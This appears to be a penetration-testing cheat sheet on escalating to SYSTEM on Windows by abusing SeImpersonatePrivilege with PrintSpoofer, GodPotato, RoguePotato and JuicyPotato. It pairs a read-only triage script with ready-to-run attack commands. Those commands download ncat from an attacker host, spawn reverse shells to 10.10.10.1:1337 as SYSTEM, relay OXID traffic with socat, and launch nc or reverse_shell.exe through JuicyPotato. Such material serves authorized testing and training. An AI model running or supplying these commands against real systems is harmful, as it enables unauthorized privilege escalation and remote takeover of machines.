# SeImpersonatePrivilege Exploit

* Check your privileges: first, verify that the current user's token holds `SeImpersonatePrivilege` or `SeAssignPrimaryTokenPrivilege` (`whoami /priv`). The privilege only needs to be present; it may be listed as Disabled, because the tools enable it themselves. Service accounts (IIS, MSSQL, LOCAL/NETWORK SERVICE) normally have it.
* Is the Print Spooler running? Use `sc query spooler` (or `Get-Service Spooler`). If it is, PrintSpoofer is usually the most direct route to SYSTEM: it abuses the spooler's named-pipe callback, so it needs no outbound connection from the target and no CLSID hunting.
* Assess the Windows version:
  * Modern and patched (Windows 10 1809+, Windows 11, Server 2019/2022):
    * Start with GodPotato. It abuses the rpcss OXID resolver in a way that survived the DCOM hardening introduced in Windows 10 1809, so it works from Windows 8 / Server 2012 through Windows 11 / Server 2022. Builds are provided for .NET 2, 3.5 and 4, so match the installed runtime.
    * If that fails, try RoguePotato, which was written for these builds after Juicy Potato stopped working on them. It needs a host you control to answer on TCP port 135, so the target must be able to reach you on that port.
    * JuicyPotatoNG and SweetPotato also target these builds and are worth a try when the first two fail.
  * Older systems (Windows 7, 8, 10 before 1809, Server 2008-2016):
    * Juicy Potato is the reliable choice. Its flexibility with CLSIDs (any DCOM server that runs as SYSTEM) makes it a favourite; pick a CLSID that is valid for the target OS.
    * If Juicy Potato does not work, fall back to the original Rotten Potato.
* Consider the environment: RoguePotato needs outbound TCP/135 to a host you control, PrintSpoofer needs the Spooler service, and Juicy Potato needs a CLSID that still works on that build. In restricted environments one of these will be blocked or disabled, so if one Potato fails, try another; they rely on different services and communication paths.
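The checks above collapsed into one triage script, as an added example that is not part of the original notes: run it on the target once you have a shell and it reports which privileges, services and runtimes are present and suggests the order in which to try the tools. The build threshold 17763 (Windows 10 1809 / Server 2019, where Juicy Potato stopped working) and the tool ordering are assumptions taken from the guidance above; the cmdlets are standard PowerShell.

```powershell
# Added triage script (not from the original notes). Assumes a shell on the target;
# the ordering and the build-17763 cut-off follow the guidance above.

# 1. Token privileges. Disabled is fine: the Potatoes enable the privilege themselves.
$privs            = (whoami /priv) -join "`n"
$hasImpersonate   = $privs -match 'SeImpersonatePrivilege'
$hasAssignPrimary = $privs -match 'SeAssignPrimaryTokenPrivilege'
if (-not ($hasImpersonate -or $hasAssignPrimary)) {
    Write-Host "[-] Neither SeImpersonatePrivilege nor SeAssignPrimaryTokenPrivilege: Potato-style escalation will not work."
    return
}
Write-Host "[+] SeImpersonatePrivilege=$hasImpersonate SeAssignPrimaryTokenPrivilege=$hasAssignPrimary"

# 2. Print Spooler state (PrintSpoofer needs spoolsv running)
$spooler        = Get-Service -Name Spooler -ErrorAction SilentlyContinue
$spoolerRunning = ($null -ne $spooler -and $spooler.Status -eq 'Running')
Write-Host "[*] Spooler running: $spoolerRunning"

# 3. OS build, architecture and installed .NET Framework runtimes
#    (GodPotato ships NET2 / NET35 / NET4 builds; PrintSpoofer ships 32- and 64-bit builds)
$os    = Get-CimInstance Win32_OperatingSystem
$build = [int]$os.BuildNumber
$is64  = [Environment]::Is64BitOperatingSystem
$ndp   = Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -ErrorAction SilentlyContinue |
         Where-Object { $_.PSChildName -match '^v\d' } |
         Select-Object -ExpandProperty PSChildName
Write-Host "[*] $($os.Caption) build $build, 64-bit OS: $is64, .NET runtimes: $($ndp -join ', ')"

# 4. Recommendation. Build 17763 is Windows 10 1809 / Server 2019, where the DCOM
#    hardening broke the original Juicy Potato; newer builds get the newer Potatoes first.
$order = @()
if ($spoolerRunning) { $order += 'PrintSpoofer' }
if ($build -ge 17763) {
    $order += 'GodPotato', 'RoguePotato (needs outbound TCP/135 to you)', 'JuicyPotatoNG / SweetPotato'
} else {
    $order += 'JuicyPotato (pick a CLSID for this build)', 'RottenPotato'
}
Write-Host "[*] Try in this order: $($order -join ' -> ')"
```

The script only reads state; it does not attempt the escalation itself, so it is safe to run before you decide which binary to drop on the box.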

```powershell
# On the target: confirm the privilege is present (Disabled is fine; the tools enable it)
whoami /priv

# On the attacker (Linux): listener for the reverse shell
nc -lnvp 1337

# DOWNLOAD NCAT FROM ATTACKER (pick the build that matches the target's architecture)
# 32-bit
iwr -uri "http://10.10.10.1:8888/nc.exe" -OutFile ncat.exe
# 64-bit
iwr -uri "http://10.10.10.1:8888/nc64.exe" -OutFile ncat.exe

# ----------------------------------------------------------------

# PRINT SPOOFER (needs the Spooler service running; download the 32- or 64-bit binary, not both)
iwr -uri "https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer32.exe" -OutFile PrintSpoofer.exe
iwr -uri "https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe" -OutFile PrintSpoofer.exe

# -c runs the command as SYSTEM; the downloads above land in the current directory (C:\TEMP here)
.\PrintSpoofer.exe -c "C:\TEMP\ncat.exe 10.10.10.1 1337 -e cmd"

# ----------------------------------------------------------------
# Get the installed .NET Framework versions (to pick the matching GodPotato build)
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"

# GODPOTATO (download only the build that matches an installed .NET version)
iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET2.exe" -OutFile GodPotato.exe
iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET35.exe" -OutFile GodPotato.exe
iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe" -OutFile GodPotato.exe

# GodPotato takes the command with -cmd
.\GodPotato.exe -cmd "C:\TEMP\ncat.exe 10.10.10.1 1337 -e cmd"

# ----------------------------------------------------------------
# ROGUE POTATO (Windows 10 1809+ / Server 2019+; the target must reach your host on TCP/135)
# https://github.com/antonioCoco/RoguePotato
# On the attacker (10.10.10.1, Linux): port forwarder that must listen on port 135 and relays
# the target's OXID request back to the RogueOxidResolver running on the target (10.0.0.3:9999)
socat tcp-listen:135,reuseaddr,fork tcp:10.0.0.3:9999
# On the target: -r is the attacker host that answers on port 135.
# Without a local RogueOxidResolver: run RogueOxidResolver.exe on your remote (Windows) machine instead of socat.
# Use this if firewall restrictions keep the target from reaching a second port.
RoguePotato.exe -r 10.10.10.1 -e "C:\windows\system32\cmd.exe"
# All in one, with RogueOxidResolver running locally on port 9999 (paired with the socat forwarder above)
RoguePotato.exe -r 10.10.10.1 -e "C:\windows\system32\cmd.exe" -l 9999
# All in one, with a specific CLSID and a custom pipe name
RoguePotato.exe -r 10.10.10.1 -e "C:\windows\system32\cmd.exe" -l 9999 -c "{6d8ff8e1-730d-11d4-bf42-00b0d0118b56}" -p splintercode

# ----------------------------------------------------------------
# JUICY POTATO (Windows 7/8/10 before 1809, Server 2008-2016; needs a CLSID valid for the target build)
# https://github.com/ohpe/juicy-potato
# https://github.com/mishmashclone/swisskyrepo-PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#juicy-potato-abusing-the-golden-privileges
# -l COM server listen port, -p program to run, -a its arguments,
# -t CreateProcess call (t = CreateProcessWithTokenW, u = CreateProcessAsUser, * = try both), -c CLSID
JuicyPotato.exe -l 9999 -p c:\inetpub\wwwroot\upload\nc.exe -a "IP PORT -e cmd.exe" -t t -c {B91D5831-B1BD-4608-8198-D72E155020F7}
JuicyPotato.exe -l 1340 -p C:\users\User\rev.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
JuicyPotato.exe -l 1337 -p c:\Windows\System32\cmd.exe -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} -a "/c c:\users\User\reverse_shell.exe"
# Expected output while it tries the CLSID:
#   Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 1337

# ----------------------------------------------------------------
# ROTTEN POTATO (the original technique; fallback when Juicy Potato fails on an old build)
# https://github.com/breenmachine/RottenPotatoNG
```


